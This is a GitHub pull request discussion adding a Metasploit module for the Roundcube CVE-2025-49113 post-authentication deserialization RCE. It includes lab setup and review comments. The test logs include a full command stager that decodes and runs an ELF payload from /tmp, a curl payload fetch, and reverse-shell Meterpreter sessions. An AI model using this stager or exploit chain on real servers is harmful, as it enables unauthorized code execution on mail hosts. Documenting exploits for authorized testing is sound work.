Skip to content

Add Remote for Roundсube CVE-2025-49113 post-authentication RCE module #20291

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 20 commits into from
Jun 11, 2025
Merged

Add Remote for Roundсube CVE-2025-49113 post-authentication RCE module #20291

merged 20 commits into from
Jun 11, 2025
+385 −0

Conversation

vognik
Copy link
Contributor

@vognik vognik commented Jun 7, 2025
edited
Loading

Vulnerability Details

This module exploits a post-authentication remote code execution vulnerability via a file upload endpoint. The vulnerability stems from improper validation of the uploaded filename, which is deserialized on the server side without sufficient sanitization. By embedding a PHP serialization gadget chain in the filename, an authenticated attacker can achieve remote code execution.

This issue is tracked as CVE-2025-49113. Exploitation results in code execution as the web server
user.

Module Information

Module path: exploit/multi/http/roundcube_auth_rce_cve_2025_49113
Platform: Linux/Windows
Tested on: Kali Linux
Requirements: Authentication

References

Original PoC - Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization

Test Output

msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > show options

Module options (exploit/multi/http/roundcube_unauth_rce_cve_2025_49113):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9999             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the Roundcube Application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       Email User to login with
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux

msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > exploit

[*] Started reverse TCP handler on 192.168.159.129:8082 
[*] Using URL: http://192.168.159.129:9696/
[*] Fetching CSRF token...
[*] Attempting login...
[+] Login successful.
[*] Uploading malicious payload...
[*] Client 192.168.181.148 (curl/7.74.0) requested /
[*] Sending payload to 192.168.181.148 (curl/7.74.0)
[*] Sending stage (3045380 bytes) to 192.168.181.148
[*] Meterpreter session 1 opened (192.168.159.129:8082 -> 192.168.181.148:56528) at 2025-06-06 21:05:59 -0400
[+] Exploit attempt complete. Check for session.
[*] Server stopped.

meterpreter > getuid
Server username: www-data

meterpreter > sysinfo
Computer     : dante.local
OS           : Debian 11.5 (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@vognik vognik changed the title Add Remote for Roundсube CVE-2025-49113 unauthenticated RCE module Add Remote for Roundсube CVE-2025-49113 post-authentication RCE module Jun 7, 2025
jvoisin
jvoisin reviewed Jun 7, 2025
View reviewed changes
Copy link
Contributor

@jvoisin jvoisin left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

CC @firsov

@firsov
Copy link

firsov commented Jun 7, 2025

It should be smth like this
If version below 10510 or version.between?(10600, 10610)
Because all versions affected below 1.5.10

@vognik
Copy link
Contributor Author

vognik commented Jun 7, 2025
edited
Loading

@firsov that's true, thanks!

@jvoisin fixed everything.
left only the image uploading in the old way, because otherwise the server returns an error about the image size (wrote above)

@msutovsky-r7 msutovsky-r7 self-assigned this Jun 9, 2025
msutovsky-r7
msutovsky-r7 reviewed Jun 9, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hi @vognik, thank you for your contribution! I had trouble making your module run. It seems like the payload is sent, but never triggered. I'll check this out later, but in meantime, would you mind providing steps to setup target as you have tested?

@vognik
Copy link
Contributor Author

vognik commented Jun 9, 2025

@msutovsky-r7 thanks for feedback!

I committed the changes and specified in the documentation the docker-compose I used

version: '3'
services:
  db:
    image: mariadb:10.5
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: example_root_pass
      MYSQL_DATABASE: roundcube
      MYSQL_USER: roundcube_user
      MYSQL_PASSWORD: roundcube_pass
    volumes:
      - db_data:/var/lib/mysql
  roundcube:
    image: roundcube/roundcubemail:1.5.9-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    environment:
      ROUNDCUBEMAIL_DEFAULT_HOST: <ROUNDCUBEMAIL_DEFAULT_HOST>
      ROUNDCUBEMAIL_SMTP_SERVER: <ROUNDCUBEMAIL_SMTP_SERVER>
      ROUNDCUBEMAIL_SMTP_PORT: 587
      ROUNDCUBEMAIL_SMTP_USER: <ROUNDCUBEMAIL_SMTP_USER>
      ROUNDCUBEMAIL_SMTP_PASS: <ROUNDCUBEMAIL_SMTP_PASS>
      ROUNDCUBEMAIL_DES_KEY: randomstring
      ROUNDCUBEMAIL_DB_TYPE: mysql
      ROUNDCUBEMAIL_DB_HOST: db
      ROUNDCUBEMAIL_DB_USER: roundcube_user
      ROUNDCUBEMAIL_DB_PASSWORD: roundcube_pass
      ROUNDCUBEMAIL_DB_NAME: roundcube
volumes:
  db_data:

Chocapikk
Chocapikk reviewed Jun 9, 2025
View reviewed changes
@vognik @Chocapikk
Apply suggestions from code review
5725e6f 
Co-authored-by: Valentin Lobstein <[email protected]>
msutovsky-r7
msutovsky-r7 reviewed Jun 10, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > run verbose=true 
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 172.20.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Extracted version: 10509
[+] The target appears to be vulnerable.
[*] Fetching CSRF token...
[+] Extracted token: NorYS2SUl9hvp5yTB5zieYbIWrtVMLOT
[*] Attempting login...
[+] Login successful.
[*] Preparing payload...
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwUAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/IQhuv.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/GAawB' < '/tmp/IQhuv.b64' ; chmod +x '/tmp/GAawB' ; '/tmp/GAawB' ; rm -f '/tmp/GAawB' ; rm -f '/tmp/IQhuv.b64'"]
[+] Payload successfully generated and serialized.
[*] Uploading malicious payload...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (172.20.0.1:4444 -> 172.20.0.3:40862) at 2025-06-10 12:02:33 +0200
[+] Exploit attempt complete. Check for session.

msutovsky-r7
msutovsky-r7 reviewed Jun 10, 2025
View reviewed changes
msutovsky-r7
msutovsky-r7 approved these changes Jun 11, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @vognik, great module!

msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > run verbose=true 
[*] Started reverse TCP handler on 172.19.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Extracted version: 10509
[+] The target appears to be vulnerable.
[*] Fetching CSRF token...
[+] Extracted token: aHSkYDWrIULj8XDuw60qWwfNbbRYkCaL
[*] Attempting login...
[+] Login successful.
[*] Preparing payload...
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwTAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/EGVbO.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/UUsED' < '/tmp/EGVbO.b64' ; chmod +x '/tmp/UUsED' ; '/tmp/UUsED' ; rm -f '/tmp/UUsED' ; rm -f '/tmp/EGVbO.b64'"]
[+] Payload successfully generated and serialized.
[*] Uploading malicious payload...
[+] Exploit attempt complete. Check for session.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.19.0.3
[*] Meterpreter session 5 opened (172.19.0.1:4444 -> 172.19.0.3:60118) at 2025-06-11 10:31:37 +0200

meterpreter > sysinfo
Computer     : 172.19.0.3
OS           : Debian 11.5 (Linux 6.12.10-76061203-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@msutovsky-r7 msutovsky-r7 merged commit f2920f8 into rapid7:master Jun 11, 2025
18 checks passed
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 11, 2025
@msutovsky-r7
Copy link
Contributor

Release Notes

This adds module for CVE-2025-49113 - remote code execution by PHP object deserialization. The module requires user credentials for successful exploitation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@Chocapikk Chocapikk Chocapikk left review comments

@msutovsky-r7 msutovsky-r7 msutovsky-r7 approved these changes

Assignees

@msutovsky-r7 msutovsky-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@vognik @firsov @msutovsky-r7 @jvoisin @Chocapikk